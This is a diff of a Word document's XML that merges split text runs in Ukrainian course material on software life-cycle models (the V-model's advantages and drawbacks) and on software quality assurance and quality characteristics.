-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>добре</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
+        <w:t>Вона добре спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1780,25 +1335,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">при правильному використанні моделі дефекти можна виявити </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>на б</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ільш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
+        <w:t>при правильному використанні моделі дефекти можна виявити на більш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1821,25 +1358,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробникі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробників;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1862,25 +1381,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проекті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проектів;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1903,61 +1404,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Вона визначає процедури з контролю </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>за</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> якістю. Кожні отримані дані </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>іддаються огляду. Така процедура використовується командою розробникі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> для визначення якості системи;</w:t>
+        <w:t>Вона визначає процедури з контролю за якістю. Кожні отримані дані піддаються огляду. Така процедура використовується командою розробників для визначення якості системи;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1980,25 +1427,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">стадії моделі досить </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>добре</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> визначені і зрозумілі;</w:t>
+        <w:t>стадії моделі досить добре визначені і зрозумілі;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2109,25 +1538,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">відповідним для нас, виявляються </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>такими</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> недоліки:</w:t>
+        <w:t>відповідним для нас, виявляються такими недоліки:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2770,25 +2181,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>є,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
+        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонструє, що тестування продукту обговорюється</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2822,43 +2215,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-н</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>пунктирною</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи -на фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений пунктирною лінією між прямокутниками V-подібної моделі.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2924,18 +2281,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">, була розроблена як </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>, була розроблена як р</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2951,61 +2298,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>фазами</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається після завершення отримання результативних даних попередньої фази. Модель демонструє комплексний підхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і фазами </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3849,25 +3142,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">в ній не враховані ітерації </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>між</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> фазами;</w:t>
+        <w:t>в ній не враховані ітерації між фазами;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3890,25 +3165,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">в моделі не передбачено внесення вимоги динамічних змін на </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ізних етапах життєвого циклу;</w:t>
+        <w:t>в моделі не передбачено внесення вимоги динамічних змін на різних етапах життєвого циклу;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3931,25 +3188,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">тестування вимог в життєвому циклі відбувається занадто </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
+        <w:t>тестування вимог в життєвому циклі відбувається занадто пізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3972,25 +3211,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в модель не входять дії, спрямовані на аналіз ризикі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>в модель не входять дії, спрямовані на аналіз ризиків.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4016,23 +3237,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>З</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>З метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4075,25 +3286,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Планування, що полягає в </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідготовці плану робіт, в якому знаходять відображення вимоги до якості, розподіляються завдання між виконавцями, складаються графіки і розділяється відповідальність.</w:t>
+        <w:t>Планування, що полягає в підготовці плану робіт, в якому знаходять відображення вимоги до якості, розподіляються завдання між виконавцями, складаються графіки і розділяється відповідальність.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4111,23 +3304,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування відповідно до потреб конкретного проекту.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування відповідно до потреб конкретного проекту. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4177,25 +3360,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>його в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідповідність встановленим вимогам, що стосуються ефективності функціонування і стандартів якості.</w:t>
+        <w:t>створення нових ручних і автоматичних процедур, що дозволяють контролювати його відповідність встановленим вимогам, що стосуються ефективності функціонування і стандартів якості.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4241,25 +3406,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Спостереження за випробуваннями програмних засобів, що припускає складання звіті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> про випробування з аналізом проблем, причин помилок і обгрунтованому коригувальних дій.</w:t>
+        <w:t>Спостереження за випробуваннями програмних засобів, що припускає складання звітів про випробування з аналізом проблем, причин помилок і обгрунтованому коригувальних дій.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4282,25 +3429,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Збереження робочої документації, що стосується звітів про проблеми проектування і програмування системи, контрольних прикладів, протоколів випробувань, тестових даних, оглядів якості та інших аспекті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Збереження робочої документації, що стосується звітів про проблеми проектування і програмування системи, контрольних прикладів, протоколів випробувань, тестових даних, оглядів якості та інших аспектів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4376,20 +3505,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>І</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>В</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>ІВ</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4945,25 +4062,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визнача</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>є,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> що саме робить ПЗ, які завдання воно вирішує</w:t>
+        <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визначає, що саме робить ПЗ, які завдання воно вирішує</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4986,25 +4085,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Функціональна придатність (suitability). Здатність вирішувати потрібний набі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> завдань.</w:t>
+        <w:t>Функціональна придатність (suitability). Здатність вирішувати потрібний набір завдань.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5144,25 +4225,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Надійність (reliability). Здатність ПЗ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідтримувати певну працездатність в заданих умовах.</w:t>
+        <w:t>Надійність (reliability). Здатність ПЗ підтримувати певну працездатність в заданих умовах.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5219,23 +4282,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Ст</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
